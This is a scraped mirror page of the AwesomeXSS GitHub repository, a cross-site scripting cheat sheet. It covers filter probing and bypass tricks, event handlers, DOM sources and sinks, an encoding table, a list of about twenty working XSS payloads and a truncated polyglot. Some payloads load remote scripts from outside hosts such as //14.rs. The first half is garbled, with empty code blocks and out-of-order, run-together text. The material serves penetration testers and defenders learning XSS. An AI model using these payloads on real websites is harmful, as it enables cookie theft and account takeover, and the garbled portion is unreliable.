ECN>> AwesomeXSS>> 返回
项目作者: s0md3v

项目描述 :
Awesome XSS stuff
高级语言: JavaScript
项目地址: git://github.com/s0md3v/AwesomeXSS.git
创建时间: 2018-03-11T14:35:30Z
项目社区:https://github.com/s0md3v/AwesomeXSS
开源协议:MIT License
下载


` ``` Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png) ### Awesome Tags & Event Handlers - [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md) - [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J) Some less detected event handlers ``` ontoggle onauxclick ondblclick oncontextmenu onmouseleave ontouchcancel ``` Some HTML Tags that you will be using ``` img svg body html embed script object details isindex iframe audio video ``` ### Awesome Context Breaking #### HTML Context Case: `You searched for $input. ` ``` ``` #### Attribute Context Case: `` ``` "> "> ``` ### Awesome Probing If nothing of this works, take a look at **Awesome Bypassing** section First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about number and contexts of reflections.
Now for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x"d3v`, chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`, if it gets altered to `x'`, you are doomed. The only thing you can try is encoding.
If the quotes are not being filtered, you can simply try payloads from **Awesome Context Breaking** section.
For javascript context, check which quotes are being used for example if they are doing ``` variable = 'value' or variable = "value" ``` Now lets say single quotes (') are in use, in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\'d3v`. If it works use the following payload: ``` \'-alert()// ``` But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using ``` ``` For simple HTML context, the probe is `x`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply bypassed using ```
``` ### Awesome Bypassing **Note:** None of these payloads use single (') or double quotes ("). - Without event handlers ``` click here ``` - Without space ``` ``` - Without equal sign (=) ``` ``` - Without closing angular bracket (>) ``` ``` - Without a Valid HTML tag ``` click here drag it ``` - Bypass tag blacklisting ``` ``` ### Awesome Encoding |HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL| |----|----|-------|-----------|----|--------|----------|---| |`"`|"|`"`|quotation mark|u+0022|\0022|\42|%22| |`#`|#|`#`|number sign|u+0023|\0023|\43|%23| |`$`|$|`$`|dollar sign|u+0024|\0024|\44|%24| |`%`|%|`%`|percent sign|u+0025|\0025|\45|%25| |`&`|&|`&`|ampersand|u+0026|\0026|\46|%26| |`'`|'|`'`|apostrophe|u+0027|\0027|\47|%27| |`(`|(|`(`|left parenthesis|u+0028|\0028|\50|%28| |`)`|)|`)`|right parenthesis|u+0029|\0029|\51|%29| |`*`|*|`*`|asterisk|u+002A|\002a|\52|%2A| |`+`|+|`+`|plus sign|u+002B|\002b|\53|%2B| |`,`|,|`,`|comma|u+002C|\002c|\54|%2C| |`−`|-|`-`|hyphen-minus|u+002D|\002d|\55|%2D| |`.`|.|`.`|full stop; period|u+002E|\002e|\56|%2E| |`/`|/|`/`|solidus; slash|u+002F|\002f|\57|%2F| |`:`|:|`:`|colon|u+003A|\003a|\72|%3A| |`;`|;|`;`|semicolon|u+003B|\003b|\73|%3B| |`<`|<|`<`|less-than|u+003C|\003c|\74|%3C| |`=`|=|`=`|equals|u+003D|\003d|\75|%3D| |`>`|>|`>`|greater-than sign|u+003E|\003e|\76|%3E| |`?`|?|`?`|question mark|u+003F|\003f|\77|%3F| |`@`|@|`@`|at sign; commercial at|u+0040|\0040|\100|%40| |`[`|\[|`[`|left square bracket|u+005B|\005b|\133|%5B| |`\`|\|`\`|backslash|u+005C|\005c|\134|%5C| |`]`|]|`]`|right square bracket|u+005D|\005d|\135|%5D| |`^`|^|`^`|circumflex accent|u+005E|\005e|\136|%5E| |`_`|_|`_`|low line|u+005F|\005f|\137|%5F| |```|\`|```|grave accent|u+0060|\0060|\u0060|%60| |`{`|{|`{`|left curly bracket|u+007b|\007b|\173|%7b| |`|`|\||`|`|vertical bar|u+007c|\007c|\174|%7c| |`}`|}|`}`|right curly bracket|u+007d|\007d|\175|%7d| ### Awesome Tips & Tricks - `http(s)://` can be shortened to `//` or `/\\` or `\\`. - `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well. - alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()` - You can use `//` to close a tag instead of `>`. - I have found that `confirm` is the least detected pop-up function so stop using `alert`. - Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use `

AwesomeXSS

This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.

Awesome contents

Awesome Challenges

Awesome Reads & Presentations

Awesome Tools

Awesome XSS Mind Maps

A beautiful XSS mind map by Jack Masa, here

Awesome DOM XSS

  • Does your input go into a sink? Vulnerable
  • It doesn’t? Not vulnerable

Source: An input that could be controlled by an external (untrusted) source.

  1. document.URL
  2. document.documentURI
  3. document.URLUnencoded (IE 5.5 or later Only)
  4. document.baseURI
  5. location
  6. location.href
  7. location.search
  8. location.hash
  9. location.pathname
  10. document.cookie
  11. document.referrer
  12. window.name
  13. history.pushState()
  14. history.replaceState()
  15. localStorage
  16. sessionStorage

Sink: A potentially dangerous method that could lead to a vulnerability. In this case a DOM Based XSS.

  1. eval
  2. Function
  3. setTimeout
  4. setInterval
  5. setImmediate
  6. execScript
  7. crypto.generateCRMFRequest
  8. ScriptElement.src
  9. ScriptElement.text
  10. ScriptElement.textContent
  11. ScriptElement.innerText
  12. anyTag.onEventName
  13. document.write
  14. document.writeln
  15. anyElement.innerHTML
  16. Range.createContextualFragment
  17. window.location
  18. document.location

This comprehensive list of sinks and source is taken from domxsswiki.

Awesome Payloads

  1. <A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
  2. <d3"<"/onclick="1>[confirm``]"<">z
  3. <d3/onmouseenter=[2].find(confirm)>z
  4. <details open ontoggle=confirm()>
  5. <script y="><">/*<script* */prompt()</script
  6. <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
  7. <a href="javascript%26colon;alert(1)">click
  8. <a href=javascript:alert(1)>click
  9. <script/"<a"/src=data:=".<a,[8].some(confirm)>
  10. <svg/x=">"/onload=confirm()//
  11. <--`<img/src=` onerror=confirm``> --!>
  12. <svg%0Aonload=%09((pro\u006dpt))()//
  13. <sCript x>(((confirm)))``</scRipt x>
  14. <svg </onload ="1> (_=prompt,_(1)) "">
  15. <!--><script src=//14.rs>
  16. <embed src=//14.rs>
  17. <script x=">" src=//15.rs></script>
  18. <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` /></Image>
  19. <iframe/src \/\/onload = prompt(1)
  20. <x oncut=alert()>x
  21. <svg onload=write()>

Awesome Polyglots

Here’s an XSS polyglot that I made which can break out of 20+ contexts:
`` %0ajavascript:/\”/—><svg onload=’/*